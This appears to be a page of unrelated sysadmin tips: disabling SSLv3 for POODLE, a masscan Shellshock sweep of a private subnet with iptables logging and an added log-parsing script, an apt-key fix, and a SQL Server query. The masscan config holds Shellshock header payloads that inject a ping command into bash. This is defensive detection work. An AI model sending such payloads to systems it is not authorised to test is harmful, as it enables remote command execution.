This site works really well. I highly recommend it.
https://www.tinfoilsecurity.com/poodle
Here is how to disable SSLv3 in Apache and nginx.
Just for fun, before you do it, scan your site with this tool:
https://www.tinfoilsecurity.com/poodle
Qualys SSL Server Test (this one is much better; tinfoilhat was the first one I found that found POODLE)
In Apache, add this to your Apache config (apache2.conf or security.conf):
SSLProtocol all -SSLv2 -SSLv3
In Nginx, add this to your HTTP block:
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
Now use https://www.tinfoilsecurity.com/poodle to scan it again.
Done.
cd /root
sudo apt-get install git gcc make libpcap-dev
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
Then I copied this into a file, shellshock.conf:
range = 172.16.1.1-172.16.1.254
port = 80
banners = true
http-user-agent = shellshock-scan
http-header = Cookie:() { :; }; ping -c 3 172.16.1.217
http-header = Host:() { :; }; ping -c 3 172.16.1.217
http-header = Referer:() { :; }; ping -c 3 172.16.1.217
Then I ssh’ed to 172.16.1.217 and added this to my /etc/iptables.rules file:
-N LOGGING
-A LOGGING -m limit --limit 200/min -j LOG --log-prefix "SHELLSHOCK: " --log-level 7
-A LOGGING -j RETURN
-A INPUT -s 172.16.1.0/24 -p icmp --icmp-type echo-request -j LOGGING
I tested by pinging it, and it logged.
Then I ran /root/masscan/bin/masscan -c shellshock.conf
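To read the result of the scan above, the entries written by the LOGGING chain have to be reduced to a list of hosts that pinged back. The following is an added example, not part of the original post: it parses kernel log lines carrying the "SHELLSHOCK: " prefix and counts ICMP echo requests per source. The function name, the sample log lines and the admin workstation address 172.16.1.10 (standing in for the manual test ping) are assumptions made for illustration.

```python
import ipaddress
import re
from collections import Counter

# Constructed sample: kernel log lines in the iptables LOG format, carrying the
# "SHELLSHOCK: " prefix from the LOGGING chain in the post. Not real capture data.
SAMPLE_LOG = """\
Oct  2 10:14:02 mon kernel: [5101.2] SHELLSHOCK: IN=eth0 OUT= MAC=00:16:3e:aa:bb:cc:00:16:3e:00:00:0a:08:00 SRC=172.16.1.10 DST=172.16.1.217 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=911 SEQ=1
Oct  2 10:15:01 mon kernel: [5160.1] SHELLSHOCK: IN=eth0 OUT= MAC=00:16:3e:aa:bb:cc:00:16:3e:00:00:32:08:00 SRC=172.16.1.50 DST=172.16.1.217 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=3021 SEQ=1
Oct  2 10:15:02 mon kernel: [5161.1] SHELLSHOCK: IN=eth0 OUT= MAC=00:16:3e:aa:bb:cc:00:16:3e:00:00:32:08:00 SRC=172.16.1.50 DST=172.16.1.217 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=3021 SEQ=2
Oct  2 10:15:03 mon kernel: [5162.1] SHELLSHOCK: IN=eth0 OUT= MAC=00:16:3e:aa:bb:cc:00:16:3e:00:00:32:08:00 SRC=172.16.1.50 DST=172.16.1.217 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=3021 SEQ=3
Oct  2 10:15:04 mon kernel: [5163.4] SHELLSHOCK: IN=eth0 OUT= MAC=00:16:3e:aa:bb:cc:00:16:3e:00:00:4d:08:00 SRC=172.16.1.77 DST=172.16.1.217 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=0 DF PROTO=ICMP TYPE=8 CODE=0 ID=777 SEQ=1
Oct  2 10:15:09 mon kernel: [5168.9] SSH: IN=eth0 OUT= MAC=00:16:3e:aa:bb:cc:00:16:3e:00:00:63:08:00 SRC=172.16.1.99 DST=172.16.1.217 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=4242 DF PROTO=TCP SPT=51514 DPT=22 WINDOW=29200 RES=0x00 SYN URGP=0
"""

# Only lines with our log prefix that record an ICMP echo request (type 8).
ENTRY = re.compile(
    r"SHELLSHOCK: .*?\bSRC=(?P<src>[0-9.]+)\b.*?\bPROTO=ICMP\b.*?\bTYPE=8\b"
)


def hosts_that_pinged(log_text, ignore=()):
    """Count logged echo requests per source IP, skipping sources in `ignore`.

    `ignore` is for hosts known to ping for other reasons, such as the
    workstation used for the manual test ping (hypothetical 172.16.1.10 here).
    """
    skip = {ipaddress.ip_address(a) for a in ignore}
    hits = Counter()
    for line in log_text.splitlines():
        m = ENTRY.search(line)
        if not m:
            continue  # other prefix, other protocol, or not a LOG entry
        try:
            src = ipaddress.ip_address(m.group("src"))
        except ValueError:
            continue  # malformed address field
        if src not in skip:
            hits[src] += 1
    # Return plain strings, ordered numerically by address.
    return {str(ip): n for ip, n in sorted(hits.items())}


if __name__ == "__main__":
    for host, count in hosts_that_pinged(SAMPLE_LOG, ignore=["172.16.1.10"]).items():
        print(f"{host} sent {count} echo request(s): check and patch bash")
```

The `--limit 200/min` in the LOGGING rule can drop entries during a scan, so the counts are a lower bound. A host that does not appear is not proven safe, since it may block outbound ICMP or lack `ping`.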
I am getting:
W: GPG error: http://archive.canonical.com quantal Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 40976EAF437D05B5 NO_PUBKEY 3B4FE6ACC0B21F32
The fix:
sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 40976EAF437D05B5
This works in SQL Server 2005 or better.
SELECT * FROM sys.dm_db_missing_index_details
Too easy!
See this link for more information.